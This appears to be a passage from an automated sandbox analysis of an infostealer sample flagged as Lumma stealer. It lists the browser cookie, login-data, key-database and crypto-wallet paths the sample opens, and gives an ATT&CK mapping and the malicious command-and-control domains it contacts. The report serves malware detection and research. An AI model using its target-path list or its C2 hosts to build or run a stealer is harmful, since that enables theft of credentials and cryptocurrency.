Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet (x2)
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets (x2)
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Directory queried: C:\Users\user\Documents (x10)
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS (x4)
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Directory queried: C:\Users\user\Documents\EWZCVGNOWT (x6)
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Directory queried: C:\Users\user\Documents\GAOBCVIQIJ (x4)
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Directory queried: C:\Users\user\Documents\LSBIHQFDVT (x2)
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Directory queried: C:\Users\user\Documents\MXPXCVPDVN (x5)
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Directory queried: C:\Users\user\Documents\JDDHMPCDUJ (x2)
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Directory queried: C:\Users\user\Documents\QNCYCDFIJJ (x2)
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: number of queries: 1001
                    Source: Yara matchFile source: Process Memory Space: BnJxmraqlk.exe PID: 612, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match | File source: Process Memory Space: BnJxmraqlk.exe PID: 612, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: BnJxmraqlk.exe, type: SAMPLE
Source: Yara match | File source: 0.0.BnJxmraqlk.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2097325289.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2349512042.000000000021B000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2165991499.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
ATT&CK matrix (techniques listed per tactic column; numbers in parentheses are the counts attached to the technique in the original matrix):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (12); Command and Scripting Interpreter (2); PowerShell (1); Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (21); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1); Steganography
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Query Registry (1); Security Software Discovery (221); Virtualization/Sandbox Evasion (21); Process Discovery (1); File and Directory Discovery (2); System Information Discovery (22)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System (31); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

Source | Detection | Scanner | Label
BnJxmraqlk.exe | 34% | Virustotal | (none)
BnJxmraqlk.exe | 32% | ReversingLabs | Win32.Spyware.Lummastealer
BnJxmraqlk.exe | 100% | Joe Sandbox ML | (none)
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
Source | Detection | Scanner | Label
spottercurvei.click | 100% | Avira URL Cloud | malware
https://community.fastly.steamstatic.co- | 0% | Avira URL Cloud | safe
https://sputnik-1985.com/~ | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/api | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/api:u | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/api298 | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/ | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/apila | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/s& | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/s6 | 100% | Avira URL Cloud | malware
https://community.fastl | 0% | Avira URL Cloud | safe
https://sputnik-1985.com/apilaV | 100% | Avira URL Cloud | malware


Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 104.102.49.254 | true | false | (none) | high
sputnik-1985.com | 104.21.48.1 | true | true | (none) | unknown
cloudewahsj.shop | unknown | unknown | false | (none) | high
noisycuttej.shop | unknown | unknown | true | (none) | unknown
spottercurvei.click | unknown | unknown | true | (none) | unknown
nearycrepso.shop | unknown | unknown | true | (none) | unknown
framekgirus.shop | unknown | unknown | true | (none) | unknown
rabidcowse.shop | unknown | unknown | true | (none) | unknown
wholersorie.shop | unknown | unknown | true | (none) | unknown
tirepublicerj.shop | unknown | unknown | true | (none) | unknown
abruptyopsn.shop | unknown | unknown | false | (none) | high
Name | Malicious | Antivirus Detection | Reputation
spottercurvei.click | true | Avira URL Cloud: malware | unknown
https://sputnik-1985.com/api | true | Avira URL Cloud: malware | unknown
https://steamcommunity.com/profiles/76561199724331900 | false | (none) | high
rabidcowse.shop | false | (none) | high
cloudewahsj.shop | false | (none) | high
nearycrepso.shop | false | (none) | high
abruptyopsn.shop | false | (none) | high
wholersorie.shop | false | (none) | high
Name / Source / Malicious / Antivirus Detection / Reputation (one entry per URL found in memory):

Name: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://duckduckgo.com/chrome_newtab
Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2201713483.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://duckduckgo.com/ac/?q=
Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2201713483.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: BnJxmraqlk.exe
Malicious: false; Reputation: high

Name: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: BnJxmraqlk.exe
Malicious: false; Reputation: high

Name: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://steamcommunity.com/?subsection=broadcasts
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://community.fastly.steamstatic.co-
Source: BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Antivirus detection: Avira URL Cloud: safe; Reputation: unknown

Name: https://store.steampowered.com/subscriber_agreement/
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://sputnik-1985.com/~
Source: BnJxmraqlk.exe, 00000000.00000003.2295432665.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2286149060.0000000000F23000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2305113764.0000000000F22000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2285688248.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
Malicious: true; Antivirus detection: Avira URL Cloud: malware; Reputation: unknown

Name: http://www.valvesoftware.com/legal.htm
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=en
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl
Source: BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: BnJxmraqlk.exe
Malicious: false; Reputation: high

Name: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=en
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: http://store.steampowered.com/privacy_agreement/
Source: BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: BnJxmraqlk.exe, 00000000.00000003.2268991081.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C18000.00000004.00000800.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://store.steampowered.com/points/shop/
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2201713483.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://sputnik-1985.com/apila
